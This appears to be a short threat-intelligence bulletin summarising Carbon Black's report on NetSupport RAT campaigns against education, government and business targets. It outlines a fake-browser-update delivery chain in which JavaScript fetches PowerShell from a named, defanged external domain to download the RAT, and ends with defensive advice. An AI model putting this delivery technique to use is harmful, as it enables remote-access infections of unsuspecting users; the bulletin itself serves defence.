Experts Warn of a Surge in NetSupport Rat Attacks Against Education and Government Sectors

Cyber Security Threat Summary:
In a report released this week, Carbon Black shared details of a recent rise in infections related to the NetSupport RAT over the past few weeks. Specifically, the RAT was being deployed against targets in the education, government, and business services sectors.

“NetSupport RAT is a remote control and desktop management software developed by NetSupport Ltd. It is designed to facilitate IT administrators and support staff in managing and controlling multiple remote computers from a centralized location. NetSupport Manager allows users to perform various tasks remotely, including troubleshooting, software distribution, system monitoring, and file transfers” (Security Affairs, 2023).

Security Officer Comments:
Various threat actors, including TA569, have been using NetSupport RAT in campaigns over the past few years. The software is typically delivered through fraudulent updates, drive-by downloads, phishing, and through malware loaders like GhostPulse.

In this recent campaign, threat actors were using older versions of NetSupport RAT which use .BAT and .VBS files as decoys, fake browser updates were the medium for distribution. According to Carbon Black, “Victims were tricked into downloading a fake browser update after visiting a compromised website. These infected websites host a PHP script which displays a seemingly authentic update. When the victim clicks on the download link, an additional JavaScript payload is downloaded onto the endpoint.”

Upon downloading the Javascript (“Update_browser_10.6336[.]js“) it retrieves and execute a Powershell script from an external domain (i.e. implacavelvideos[.]com). The Powershell is used to retrieve a ZIP archive containing the NetSupport RAT.

Suggested Correction(s):
Carbon Black in their report shared various indicators of compromise (IoCs). Users should follow phishing best practices and should monitor web URLs to ensure browser update messages are coming from legitimate sources. Threat actors are very good at masquerading as legitimate browser updates, so additional scrutiny should be applied.